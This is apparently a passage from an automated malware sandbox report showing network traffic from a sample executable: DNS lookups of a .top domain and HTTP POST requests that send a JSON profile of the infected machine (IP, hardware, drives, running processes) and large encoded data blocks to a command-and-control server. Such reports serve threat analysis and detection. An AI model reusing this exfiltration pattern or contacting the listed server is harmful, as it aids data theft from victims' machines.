                                                      Dec 20, 2024 17:06:22.052020073 CET192.168.2.61.1.1.1c208(Port unreachable)Destination Unreachable

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 20, 2024 17:05:18.552548885 CET192.168.2.61.1.1.10x67d2Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:05:18.552608013 CET192.168.2.61.1.1.10x39c7Standard query (0)httpbin.org28IN (0x0001)false
                                                      Dec 20, 2024 17:05:21.685854912 CET192.168.2.61.1.1.10x4d9dStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:05:21.686286926 CET192.168.2.61.1.1.10xe9fdStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                      Dec 20, 2024 17:05:55.272933006 CET192.168.2.61.1.1.10x6ed1Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:05:55.272985935 CET192.168.2.61.1.1.10x10f3Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                      Dec 20, 2024 17:06:19.947207928 CET192.168.2.61.1.1.10x24d2Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:19.947326899 CET192.168.2.61.1.1.10x7bdfStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                      Dec 20, 2024 17:06:19.947391033 CET192.168.2.61.1.1.10x24d2Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.372026920 CET192.168.2.61.1.1.10xdbe4Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.372117043 CET192.168.2.61.1.1.10x9990Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.372179985 CET192.168.2.61.1.1.10xdbe4Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.759303093 CET192.168.2.61.1.1.10xac29Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.759397030 CET192.168.2.61.1.1.10xebccStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.759463072 CET192.168.2.61.1.1.10xac29Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.115068913 CET192.168.2.61.1.1.10x427eStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.115140915 CET192.168.2.61.1.1.10x2bb4Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.115201950 CET192.168.2.61.1.1.10x427eStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.535929918 CET192.168.2.61.1.1.10x1446Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.536309004 CET192.168.2.61.1.1.10x36aaStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.536426067 CET192.168.2.61.1.1.10x1446Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.908564091 CET192.168.2.61.1.1.10xe03aStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.908843994 CET192.168.2.61.1.1.10x2021Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.908910036 CET192.168.2.61.1.1.10xe03aStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.908963919 CET192.168.2.61.1.1.10x2021Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.911307096 CET192.168.2.61.1.1.10xe03aStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.911392927 CET192.168.2.61.1.1.10x2021Standard query (0)home.twentytk20pn.top28IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 20, 2024 17:05:18.691819906 CET1.1.1.1192.168.2.60x67d2No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:05:18.691819906 CET1.1.1.1192.168.2.60x67d2No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:05:22.090008020 CET1.1.1.1192.168.2.60x4d9dNo error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:05:55.411153078 CET1.1.1.1192.168.2.60x6ed1No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.086015940 CET1.1.1.1192.168.2.60x24d2No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.086029053 CET1.1.1.1192.168.2.60x24d2No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.566458941 CET1.1.1.1192.168.2.60xdbe4No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.566469908 CET1.1.1.1192.168.2.60xdbe4No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.898525953 CET1.1.1.1192.168.2.60xac29No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:20.898648024 CET1.1.1.1192.168.2.60xac29No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.252844095 CET1.1.1.1192.168.2.60x427eNo error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.253576994 CET1.1.1.1192.168.2.60x427eNo error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.674328089 CET1.1.1.1192.168.2.60x1446No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:21.674341917 CET1.1.1.1192.168.2.60x1446No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:22.051959038 CET1.1.1.1192.168.2.60xe03aNo error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:22.053455114 CET1.1.1.1192.168.2.60xe03aNo error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 17:06:22.053478956 CET1.1.1.1192.168.2.60xe03aNo error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • httpbin.org
                                                      • home.twentytk20pn.top

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649717147.45.113.159806216C:\Users\user\Desktop\S0O8qbVwLk.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 20, 2024 17:05:22.222006083 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                      Host: home.twentytk20pn.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 502459
                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 32 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710720", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", "pid": 9 [TRUNCATED]
                                                      Dec 20, 2024 17:05:22.341680050 CET4944OUTData Raw: 55 38 30 51 4d 5a 31 68 56 35 56 78 45 58 56 6b 4c 61 73 6e 5c 2f 42 4a 50 34 67 32 75 44 71 48 78 45 62 54 31 49 7a 76 75 66 68 7a 72 4d 63 57 42 31 4b 79 76 72 69 78 74 74 42 42 62 44 66 4b 43 4d 34 79 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58
                                                      Data Ascii: U80QMZ1hV5VxEXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4
                                                      Dec 20, 2024 17:05:22.341789007 CET7416OUTData Raw: 2f 77 43 66 66 35 73 56 76 35 76 6c 35 47 66 39 4b 5c 2f 48 36 39 71 5a 4a 2b 37 5c 2f 6a 33 6e 5c 2f 57 5c 2f 75 5c 2f 33 48 76 54 39 70 56 6b 54 39 33 2b 37 6c 5c 2f 37 5c 2f 41 48 2b 69 5c 2f 77 43 66 71 61 68 33 50 49 76 79 66 75 75 42 46 35
                                                      Data Ascii: /wCff5sVv5vl5Gf9K\/H69qZJ+7\/j3n\/W\/u\/3HvT9pVkT93+7l\/7\/AH+i\/wCfqah3PIvyfuuBF5Y\/f\/8A8F\/nrQajG2fOjv8Auf6evv6f5zR\/Fs\/d\/vP9V+99P8\/r3qST93s2Tb383zZZP+eP5d\/yxSeXH\/H87\/8ALKST\/X\/5\/lQdAH+B9+zy4v3Un+i\/y9exqsshVkd\/+nf3n\/4+vr1+lWfLdv4
                                                      Dec 20, 2024 17:05:22.342056036 CET4944OUTData Raw: 35 5c 2f 50 5c 2f 43 6d 65 57 5c 2f 6d 4f 2b 4e 73 30 66 38 45 6b 58 6b 66 70 55 7a 46 32 33 5c 2f 75 66 2b 75 73 66 5c 2f 4c 44 5c 2f 41 44 5c 2f 6e 69 6d 53 66 4c 38 5c 2f 33 2b 6e 37 79 53 58 39 5c 2f 6e 67 34 5c 2f 77 6f 41 72 53 52 35 6b 66
                                                      Data Ascii: 5\/P\/CmeW\/mO+Ns0f8EkXkfpUzF23\/uf+usf\/LD\/AD\/nimSfL8\/3+n7ySX9\/ng4\/woArSR5kf5I\/+mX739P89KhfZt+eTLx\/vYv+W\/1FpzVzb5nzodhP\/TL8\/pUPl\/N\/yzTzPTJ9P8\/\/AFq0p9fl+p1U6nyt+H\/A36akLN5kj702W0n\/AD0\/1+Pbp\/n6ZqFZPL3vs+TzfNx+X59880Sq6\/O6Rw+Z
                                                      Dec 20, 2024 17:05:22.342161894 CET4944OUTData Raw: 4b 33 30 71 66 6f 5c 2f 31 38 6f 71 5a 44 4e 5a 7a 48 4b 4b 74 43 57 47 65 43 6f 38 4f 56 71 4e 47 6e 54 6b 2b 64 53 6f 2b 79 71 77 6c 52 72 55 36 76 37 2b 6c 69 4b 54 6a 58 70 59 6d 4d 63 52 54 71 52 72 52 6a 55 50 33 4f 6a 39 46 58 36 51 4e 44
                                                      Data Ascii: K30qfo\/18oqZDNZzHKKtCWGeCo8OVqNGnTk+dSo+yqwlRrU6v7+liKTjXpYmMcRTqRrRjUP3Oj9FX6QNDN6WfRlk0s2p144lY6txHRr1p1IxUbVva0pqtRnS\/cVKFVToVcO5YepCVCTg\/zK\/4JP8Ax68W237UHwP\/AGT4deXxh8JdH+NvxL+LfgHWrkXFvc6XLp\/7NX7Qvhm5XS9PleZ9M0zxnY+L7PxBqOh3UiS6Hren
                                                      Dec 20, 2024 17:05:22.344104052 CET2472OUTData Raw: 37 5c 2f 31 39 66 57 6d 66 38 44 6a 54 5c 2f 6c 72 39 6f 39 65 5c 2f 74 36 66 35 7a 79 2b 50 5a 35 6d 64 2b 79 50 6a 5c 2f 70 76 54 50 76 66 78 37 48 38 30 78 66 36 72 5c 2f 58 66 35 5c 2f 58 50 76 79 48 51 4d 6b 33 5c 2f 4a 73 65 4e 5c 2f 33 76
                                                      Data Ascii: 7\/19fWmf8DjT\/lr9o9e\/t6f5zy+PZ5md+yPj\/pvTPvfx7H80xf6r\/Xf5\/XPvyHQMk3\/JseN\/3v8Az1\/L8OnSmfdZP4\/9iT8u1PbY8c2\/zE8z\/thj\/P8A9fIp8f7z1R\/+WUckWP8AP4+9AFOT+8n18r8zj+XT8u9SeYgk\/wBT5M0\/73P+u46\/6JjP+ePSnbtsibJo3T8\/8c\/0xUKyGPzmdJP3n\/Pv\/w
                                                      Dec 20, 2024 17:05:22.461466074 CET4944OUTData Raw: 46 6d 74 36 48 4e 34 6a 38 4c 51 61 35 4c 34 47 30 4c 51 50 48 63 39 6e 59 32 33 78 73 5c 2f 5a 33 30 61 5c 2f 38 41 46 50 37 53 66 69 66 39 6c 48 34 54 57 6d 72 2b 4c 5c 2f 69 6a 64 51 5c 2f 47 33 34 76 65 47 39 4a 38 45 61 78 48 59 66 44 76 58
                                                      Data Ascii: Fmt6HN4j8LQa5L4G0LQPHc9nY23xs\/Z30a\/8AFP7Sfif9lH4TWmr+L\/ijdQ\/G34veG9J8EaxHYfDvX\/DXwT8Q+E7HRfEsHxF8I23hrW\/iX4h+HdrcX2qpb6qNISGaWP8AO868VvDrh7F47A5xxVgsJistr0cJjoLD4\/Exw2MxCwkqOCqVsJha9H69OGPwVVYKNR4pUcXh60qKpVYTf6vw74JeKnFeBy\/Msh4NzDHYLN
                                                      Dec 20, 2024 17:05:22.461662054 CET9888OUTData Raw: 67 46 4e 70 31 6a 59 65 4c 5c 2f 47 65 67 61 35 34 5c 2f 38 41 68 64 34 66 38 47 65 41 5c 2f 41 76 77 7a 2b 4a 75 76 5c 2f 48 54 55 39 66 38 58 53 5c 2f 42 59 2b 41 76 6a 5a 34 5a 30 6e 78 58 38 47 4e 65 30 6a 55 4e 4a 38 41 61 70 38 53 39 65 76
                                                      Data Ascii: gFNp1jYeL\/Gega54\/8Ahd4f8GeA\/Avwz+Juv\/HTU9f8XS\/BY+AvjZ4Z0nxX8GNe0jUNJ8Aap8S9evfinput2I8I+C9H+Ft78Q5Gh1261bwhpOmeEfGF\/oHDeIvEeg6HpHxc8U6Z47+F\/jzwX8H9X+COi6x4t8C+JPFlzp\/iK8+Pfhrxv4o8IL4csPFfw98H69by6Pa\/D3xJp\/jLTfGWk+Edd0LWLeKxi0nUM3Ett8
                                                      Dec 20, 2024 17:05:22.503001928 CET27192OUTData Raw: 74 59 6e 47 63 4f 63 5a 5a 74 67 4d 37 65 44 70 5a 5a 6c 32 59 31 63 4c 6c 2b 4d 5c 2f 73 33 4b 34 5a 54 56 77 4e 62 42 59 61 6a 6a 73 4a 6a 4d 50 61 76 6d 57 4b 78 5c 2f 45 4d 36 32 49 77 32 4b 71 72 4f 63 66 69 71 30 48 48 44 54 6a 68 59 66 76
                                                      Data Ascii: tYnGcOcZZtgM7eDpZZl2Y1cLl+M\/s3K4ZTVwNbBYajjsJjMPavmWKx\/EM62Iw2KqrOcfiq0HHDTjhYfvnEn07M+44xMaPGXAeQ5nkWJzTF57m+WYXE5ll88yzvEZ9h84p5jWxeAxuDxznhcFg8Bw9RowxtKn\/YmBoYablUdSvP5L8O65oC\/C\/442n7TPx0+BHjyfxlf\/HfxL8M\/gxpvg7xv8bvjB+yH+0P8avjjHfXPi
                                                      Dec 20, 2024 17:05:22.622344017 CET7416OUTData Raw: 66 76 4a 4a 45 2b 53 4e 30 38 33 39 31 39 6f 5c 2f 63 66 35 5c 2f 6c 5c 2f 56 6b 70 66 79 5c 2f 6e 53 52 47 5c 2f 31 76 6d 66 70 39 6c 2b 31 5c 2f 77 44 50 6a 2b 50 48 71 4b 66 4a 38 72 4f 6d 5c 2f 66 6a 39 37 35 66 2b 63 39 4f 76 2b 52 6d 74 4a
                                                      Data Ascii: fvJJE+SN083919o\/cf5\/l\/Vkpfy\/nSRG\/1vmfp9l+1\/wDPj+PHqKfJ8rOm\/fj975f+c9Ov+RmtJJj5Ecv+6\/ev\/r+bz\/l6+v6jj8QAXfufHl\/63yv9I\/54f5\/xPuz\/AFe\/Ymx+P3nm\/wA\/85H5VZ+VpE+fYkn72X+vv1\/yc1WEZZN+zeh\/z\/n+nNAC\/JHJv2b3jP73y\/8AXw8Z\/nUfyxs\/kp5P\
                                                      Dec 20, 2024 17:05:22.782450914 CET1236OUTData Raw: 76 49 69 64 50 4c 6a 5c 2f 66 33 48 58 5c 2f 50 48 5c 2f 36 71 73 6e 6d 52 45 52 4a 4e 6e 5c 2f 54 50 39 78 50 4e 5c 2f 6e 33 42 71 45 72 73 2b 52 78 38 5c 2f 77 44 7a 7a 38 6f 5c 2f 35 50 58 39 66 66 4e 54 37 54 79 5c 2f 48 5c 2f 67 48 51 56 31
                                                      Data Ascii: vIidPLj\/f3HX\/PH\/6qsnmRERJNn\/TP9xPN\/n3BqErs+Rx8\/wDzz8o\/5PX9ffNT7Ty\/H\/gHQV1WHzHf\/pjbzeZUe1PnR\/8Anr5Usn\/X5n8\/p1\/EVZk2Mycfvh9nll\/ws6ZJs8wI\/wA8Plf5\/wA8\/qa0OgrSbF\/g3pnyv9aeef16mmfJD8uw7PXvD2\/Op\/LTd98bv9T7\/T\/P5Un3Y\/nf\/rnJ\/wA


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.649725147.45.113.159806216C:\Users\user\Desktop\S0O8qbVwLk.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 20, 2024 17:05:55.533757925 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                      Host: home.twentytk20pn.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 502459
                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 32 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710720", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", "pid": 9 [TRUNCATED]
                                                      Dec 20, 2024 17:05:55.654373884 CET22248OUTData Raw: 55 38 30 51 4d 5a 31 68 56 35 56 78 45 58 56 6b 4c 61 73 6e 5c 2f 42 4a 50 34 67 32 75 44 71 48 78 45 62 54 31 49 7a 76 75 66 68 7a 72 4d 63 57 42 31 4b 79 76 72 69 78 74 74 42 42 62 44 66 4b 43 4d 34 79 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58
                                                      Data Ascii: U80QMZ1hV5VxEXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4
                                                      Dec 20, 2024 17:05:55.654481888 CET2472OUTData Raw: 37 5c 2f 31 39 66 57 6d 66 38 44 6a 54 5c 2f 6c 72 39 6f 39 65 5c 2f 74 36 66 35 7a 79 2b 50 5a 35 6d 64 2b 79 50 6a 5c 2f 70 76 54 50 76 66 78 37 48 38 30 78 66 36 72 5c 2f 58 66 35 5c 2f 58 50 76 79 48 51 4d 6b 33 5c 2f 4a 73 65 4e 5c 2f 33 76
                                                      Data Ascii: 7\/19fWmf8DjT\/lr9o9e\/t6f5zy+PZ5md+yPj\/pvTPvfx7H80xf6r\/Xf5\/XPvyHQMk3\/JseN\/3v8Az1\/L8OnSmfdZP4\/9iT8u1PbY8c2\/zE8z\/thj\/P8A9fIp8f7z1R\/+WUckWP8AP4+9AFOT+8n18r8zj+XT8u9SeYgk\/wBT5M0\/73P+u46\/6JjP+ePSnbtsibJo3T8\/8c\/0xUKyGPzmdJP3n\/Pv\/w
                                                      Dec 20, 2024 17:05:55.774276018 CET9888OUTData Raw: 46 6d 74 36 48 4e 34 6a 38 4c 51 61 35 4c 34 47 30 4c 51 50 48 63 39 6e 59 32 33 78 73 5c 2f 5a 33 30 61 5c 2f 38 41 46 50 37 53 66 69 66 39 6c 48 34 54 57 6d 72 2b 4c 5c 2f 69 6a 64 51 5c 2f 47 33 34 76 65 47 39 4a 38 45 61 78 48 59 66 44 76 58
                                                      Data Ascii: Fmt6HN4j8LQa5L4G0LQPHc9nY23xs\/Z30a\/8AFP7Sfif9lH4TWmr+L\/ijdQ\/G34veG9J8EaxHYfDvX\/DXwT8Q+E7HRfEsHxF8I23hrW\/iX4h+HdrcX2qpb6qNISGaWP8AO868VvDrh7F47A5xxVgsJistr0cJjoLD4\/Exw2MxCwkqOCqVsJha9H69OGPwVVYKNR4pUcXh60qKpVYTf6vw74JeKnFeBy\/Msh4NzDHYLN
                                                      Dec 20, 2024 17:05:55.774357080 CET2472OUTData Raw: 73 4c 6a 4b 4f 57 30 38 4e 54 70 31 4b 45 36 2b 4b 7a 6a 49 4d 35 2b 73 31 31 4b 31 56 54 70 31 4f 48 36 47 47 68 50 44 31 61 46 57 4f 45 78 6d 59 55 6f 31 46 4c 45 52 71 55 66 34 33 38 42 76 70 4d 35 70 34 47 35 42 78 50 77 37 68 4f 47 63 74 7a
                                                      Data Ascii: sLjKOW08NTp1KE6+KzjIM5+s11K1VTp1OH6GGhPD1aFWOExmYUo1FLERqUf438BvpM5p4G5BxPw7hOGctz\/BcV46niMxlja1ejVjhXk+YZLicHS9nL2bp4jDZjVqP21OqqeJo4XEU1Cth6c1g+P8A9rP4i+Kfinc6\/rH7Sv7OOm+Itd+Dnxz8A\/s4\/th\/BfTP+Cm3i\/X\/ANn\/AMW678S\/hj410HWfi6v7X6fFT48eA
                                                      Dec 20, 2024 17:05:55.774426937 CET2472OUTData Raw: 2f 4f 58 47 6e 30 52 4d 68 34 7a 34 69 7a 62 4f 4d 52 78 4e 6d 32 45 79 5c 2f 4f 63 78 78 75 5a 59 33 4a 71 56 4f 69 36 46 61 76 6d 57 59 63 4e 35 6c 6a 56 50 45 63 69 78 62 56 58 45 38 4d 59 52 51 74 58 58 31 61 6c 6a 63 30 65 44 57 47 78 47 4c
                                                      Data Ascii: /OXGn0RMh4z4izbOMRxNm2Ey\/OcxxuZY3JqVOi6FavmWYcN5ljVPEcixbVXE8MYRQtXX1aljc0eDWGxGLjiKP9ZeHf07uKfD7g\/IeGsLwXkeOx3D2SRyLAZ1Xr4qNWODo4fiLDYZywaqPBTnh1xRmVeDlh71MRSwCxTxOFwzwtT4h8FXPwY8BfA\/xF+xnYePW8afDj42WfiP4gfGH9pjwxp37Q2h\/D\/wJ8Z\/g\/rKXn7M
                                                      Dec 20, 2024 17:05:55.814537048 CET27192OUTData Raw: 74 59 6e 47 63 4f 63 5a 5a 74 67 4d 37 65 44 70 5a 5a 6c 32 59 31 63 4c 6c 2b 4d 5c 2f 73 33 4b 34 5a 54 56 77 4e 62 42 59 61 6a 6a 73 4a 6a 4d 50 61 76 6d 57 4b 78 5c 2f 45 4d 36 32 49 77 32 4b 71 72 4f 63 66 69 71 30 48 48 44 54 6a 68 59 66 76
                                                      Data Ascii: tYnGcOcZZtgM7eDpZZl2Y1cLl+M\/s3K4ZTVwNbBYajjsJjMPavmWKx\/EM62Iw2KqrOcfiq0HHDTjhYfvnEn07M+44xMaPGXAeQ5nkWJzTF57m+WYXE5ll88yzvEZ9h84p5jWxeAxuDxznhcFg8Bw9RowxtKn\/YmBoYablUdSvP5L8O65oC\/C\/442n7TPx0+BHjyfxlf\/HfxL8M\/gxpvg7xv8bvjB+yH+0P8avjjHfXPi
                                                      Dec 20, 2024 17:05:55.934559107 CET9888OUTData Raw: 66 76 4a 4a 45 2b 53 4e 30 38 33 39 31 39 6f 5c 2f 63 66 35 5c 2f 6c 5c 2f 56 6b 70 66 79 5c 2f 6e 53 52 47 5c 2f 31 76 6d 66 70 39 6c 2b 31 5c 2f 77 44 50 6a 2b 50 48 71 4b 66 4a 38 72 4f 6d 5c 2f 66 6a 39 37 35 66 2b 63 39 4f 76 2b 52 6d 74 4a
                                                      Data Ascii: fvJJE+SN083919o\/cf5\/l\/Vkpfy\/nSRG\/1vmfp9l+1\/wDPj+PHqKfJ8rOm\/fj975f+c9Ov+RmtJJj5Ecv+6\/ev\/r+bz\/l6+v6jj8QAXfufHl\/63yv9I\/54f5\/xPuz\/AFe\/Ymx+P3nm\/wA\/85H5VZ+VpE+fYkn72X+vv1\/yc1WEZZN+zeh\/z\/n+nNAC\/JHJv2b3jP73y\/8AXw8Z\/nUfyxs\/kp5P\
